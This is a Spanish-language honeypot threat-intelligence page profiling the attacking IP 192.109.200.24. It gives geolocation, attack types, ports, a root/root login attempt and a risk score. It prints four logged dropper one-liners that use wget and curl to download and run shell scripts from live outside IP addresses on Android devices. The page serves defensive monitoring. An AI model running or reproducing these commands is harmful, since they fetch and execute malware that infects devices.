TROYANOSYVIRUS
Amenaza ActivaALTO

192.109.200.24

Pais de Origen🇨🇦 Canada
Primera Deteccion30/1/2026
Ultima Actividad25/2/2026
ISPOVH SAS
🎯
411
Ataques Totales
🔌
3
Puertos
📡
3
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇨🇦 Canada
Ciudad
Desconocida
ASN
AS16276
ISP
OVH SAS

Tipos de Ataque

cowrie
adbhoney
honeytrap

Puertos Atacados

2255557788

Malware Asociado

Sin malware asociado

Credenciales Intentadas

🔐root/root
1x

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://91.92.241.197:8080/bins/w.sh; sh w.sh; curl http://91.92.241.197:8080/bins/c.sh; sh c.sh; wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh73x
$cd /data/local/tmp/; busybox wget http://91.92.241.197:5124/2/w.sh; sh w.sh; curl http://91.92.241.197:5124/2/c.sh; sh c.sh; wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh31x
$cd /data/local/tmp/; busybox wget http://103.236.64.121/w.sh; sh w.sh; curl http://103.236.64.121/c.sh; sh c.sh; wget http://103.236.64.121/wget.sh; sh wget.sh; curl http://103.236.64.121/wget.sh; sh wget.sh; busybox wget http://103.236.64.121/wget.sh; sh wget.sh; busybox curl http://103.236.64.121/wget.sh; sh wget.sh24x
$cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh4x

Evaluacion de Riesgo

60
/100
BajoMedioAltoCritico